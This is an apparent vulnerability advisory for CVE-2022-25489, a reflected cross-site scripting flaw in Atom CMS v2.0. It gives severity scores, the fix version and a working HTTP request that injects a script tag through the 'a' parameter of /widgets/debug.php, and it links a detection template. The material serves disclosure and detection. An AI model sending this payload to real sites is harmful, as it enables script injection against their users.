| Title | Atom CMS v2.0 - Cross-Site Scripting |
|---|---|
| Author | theamanrawat |
| Severity | Medium |
| Impact | Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement. |
| Remediation | Fixed in version Atom CMS v2.1 |
| CVSS Score | 5.4 |
| EPSS Score | 0.08481 |
| CVE ID | CVE-2022-25489 |
| CWE ID | CWE-79 |
| Tags | cve cve2022 xss atom cms thedigitalcraft vuln |
Atom CMS v2.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the “A” parameter in /widgets/debug.php.
GET /widgets/debug.php?a=<script>alert(document.domain)</script> HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14.5) AppleWebKit/618.3.5 (KHTML, like Gecko) Version/17.4 Safari/618.3.5
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-25489.yaml
🦈 Packet Capture: ⬇️ Download cve-2022-25489.pcap
N/AN/A